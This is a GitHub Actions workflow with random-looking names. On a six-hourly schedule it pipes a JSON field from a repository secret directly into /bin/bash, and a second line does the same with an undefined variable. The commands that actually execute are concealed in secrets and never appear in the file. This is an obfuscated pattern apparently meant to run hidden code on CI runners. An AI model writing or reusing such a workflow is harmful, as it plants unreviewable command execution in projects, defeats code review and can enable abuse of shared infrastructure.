name: olympicszealous

on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: olympicszealous
        env:
          lyini3: ${{ secrets.lyini3 }}
        run: |
          echo $lyini3 | jq -r .isc27 | /bin/bash
          echo $jpvy2158 | jq -r .f6 | /bin/bash

